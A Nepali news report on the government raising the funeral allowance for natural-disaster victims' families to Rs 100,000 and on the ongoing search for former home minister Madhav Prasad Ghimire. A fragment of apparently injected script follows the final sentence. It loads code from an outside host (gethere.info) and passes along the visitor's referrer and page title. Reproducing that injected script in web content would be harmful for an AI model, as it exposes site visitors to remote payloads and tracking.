काठमाडौं, असोज १८ – सरकारले प्राकृतिक प्रकोपमा परि ज्यान गुमाएका परिवारलाई किरिया खर्च एक लाख रुपैयाँ दिने निर्णय गरेको छ ।
मंगलबार व्यवस्थापिका संसद बैठकमा उपप्रधान तथा गृहमन्त्रालयको काम कारबाही बारे जानकारी दिँदै गृहमन्त्री विमलेन्द्र निधिले किरिया खर्चका लागि एक लाख उपलव्ध गराउने बताए । sambidhan-sabha-bhawan
यसअघि प्रकोपमा परेर ज्यान भएका परिवारलाई सरकारले किरिया खर्चका लागि भनेर प्रतिव्यक्ति ४० हजार रुपैयाँ दिँदै आएको थियो । यस्तै सरकारले प्रकोपमा परेका परिवारलाई राहत स्वरुप तत्काल १० हजार दिने घोषणा गरेको छ ।
संसदमा गृहमन्त्री निधिले गाडी दुर्घटनामा परि हराई रहेका पूर्वगृहमन्त्री माधवप्रसाद घिमिरे खोजी भइरहेको जानकारी दिए । घिमिरेको खोजीका लागि ६ सयभन्दा बढी सुरक्षाकर्मी, अनुभवी गोताखोर र आधुनिक उपकरण प्रयोग भइरहेको उनले संसदलाई जानकारी दिए ।s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;